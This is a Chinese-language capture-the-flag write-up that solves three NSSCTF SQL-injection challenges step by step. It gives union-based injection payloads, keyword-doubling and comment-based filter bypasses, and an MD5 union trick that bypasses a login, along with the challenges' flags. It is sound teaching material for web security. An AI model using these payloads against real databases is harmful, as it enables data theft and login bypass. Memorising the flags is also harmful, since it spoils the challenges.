NSSCTF———Web(sql注入)

[LitCTF 2023]这是什么?SQL !注一下 !

[SWPUCTF 2022 新生赛]ez_sql

[GXYCTF 2019]BabySqli

点击右下角文章可跳转

[LitCTF 2023]这是什么?SQL !注一下 !

首先我们打开靶场查看信息,提示了闭合方式为id = (((((())))))

然后我们进行判断回显位,用order by或group by都可以,会发现2有回显,3没有回显,所以回显位为2。如果细心可以发现题目也有提示username,password也可以猜测回显位为2,如果保险起见也可以测试一下

接下来就是进行查询数据库的操作,一般来说我们用http://node5.anna.nssctf.cn:28411/?id=1)))))) union select 1,database() --+这种语句来查询,但这道题数据库有很多,而且直接查出来的数据库得到的flag是假的,所以我就不演示了,你们可以自己查查看,我们直接查询全部数据库名

我用的是union select 1,schema_name from information_schema.schemata--+来查询

可以看到有几个很可能存在flag的数据库 ctftraining和ctf,这里我就直接跟大家说第一个存在真的flag。然后进行常规的sql注入

第一步,查表名 union select 1,group_concat(table_name)from information_schema.tables where table_schema='ctftraining'--+

可以看到有一个叫flag的表名,

第二步,查列名:union select 1,group_concat(column_name)from information_schema.columns where table_name='flag'--+

最后再查询一下这个叫flag的数据就可以得到flag

union select 1,group_concat(flag)from ctftraining.flag--+

[SWPUCTF 2022 新生赛]ez_sql

上来给了一波提示,相对安全的传参意思就是POST传参,还直接提示了参数是nss,我们先尝试随便输个数字,直接给了flag,但是这flag一看就是假的

然后用nss1 and1=1 这种手段判断类型,这题是字符型我就不演示了,然后我们要去判断回显数,会发现or和空格都被过滤了

然后我们用双写or绕过,用/**/代替空格,对了这里--+也被过滤了,我们可以用#号带替--+

我们再试一次 nss=1'/**/oorrder/**/by/**/3#

如果是4的话会报错,所以回显数为3

然后我们用联合查询去查数据库名,这道题的union也被过滤了,同样我们双写绕过 nss=1'/**/uniunionon/**/select/**/1,2,database()/**/limit/**/1,1#

后面用了limit 1,1,因为第一个回显位没有我们要的信息,我们需要跳转到第二个回显位,所以得到数据库名,NSS_db

下一步就是查表名 nss=1'/**/uniunionon/**/select/**/1,2,group_concat(table_name)from/**/infoorrmation_schema.tables/**/where/**/table_schema='NSS_db'/**/limit/**/1,1#

记得information里面的or也需要双写

根据表名的格式估计flag在NSS_tb里面,继续查列名

nss=1'/**/uniunionon/**/select/**/1,2,group_concat(column_name)from/**/infoorrmation_schema.columns/**/where/**/table_name='NSS_tb'/**/limit/**/1,1#

再继续查这里面的数据 nss=1'/**/uniunionon/**/select/**/1,2,group_concat(id,Secr3t,flll444g)from/**/NSS_db.NSS_tb/**/limit/**/1,1#

得到flag:NSSCTF{b734ae20-5169-4ce2-8fce-9e3a4f0c7830}NSSCTF{b734ae20-5169-4ce2-8fce-9e3a4f0c7830}

[GXYCTF 2019]BabySqli

这道题差点把我绕懵了

首先我们打开环境是一个登录界面,先尝试一下万能密码啥的,我这里先直接抓包,在burpsuit里面操作,发送到中继发现有一串神秘字母

拿去解密一下,发现是base32和base64的加密,解密得到 select * from user where username = '$name'

这段代码的意思是检索你输入的username是否在数据库中存在,我们可能就大致对这道题的查询有点数,我们去测试一下回显

注意这里是过滤了or的用大小写绕过,发现为4时报错,说明回显有三个,但如果我们去实际查询表名列名会发现很难查出来,因为这道题的过滤非常严格。

那我们要用做题的经验来看,这是一道登录的界面,而列数又是三列,那估计三列分别对应id,username,password。再结合一开始解密的信息,依次去查询是否存在数据,那这三列就很有可能了

再加上我们可以发现,当我们随便输入账号密码时,弹出的是 wrong user!

当我们账户是admin时,弹出的是 wrong pass!

说明admin这个账户是存在的,但是我们不知道admin在第几列,我们可以去试一试,当放在第一列时:

提示用户名不对

放在第二列时,显示wrong pass! 说明username正确

我们知道了账号,那我们得知道密码才能登录成功,这里有一个知识点:mysql在查询不存在的数据时会自动构建虚拟数据,一般数据要么明文,要么MD5;

我们不知道密码我们可以去构造密码,用md5的形式,就比如我输的密码是123,那我用md5加密后输入到第三列,那也可以完成查询,登陆成功

123经过md5加密后结果为:202cb962ac59075b964b07152d234b70

下面实践:

得到flag:

NSSCTF{ce21b171-dc0b-4b09-a56d-d6cd629ae515}

这题的密码不是唯一的,随便你密码是什么,自己构造,md5加密输入进去就行啦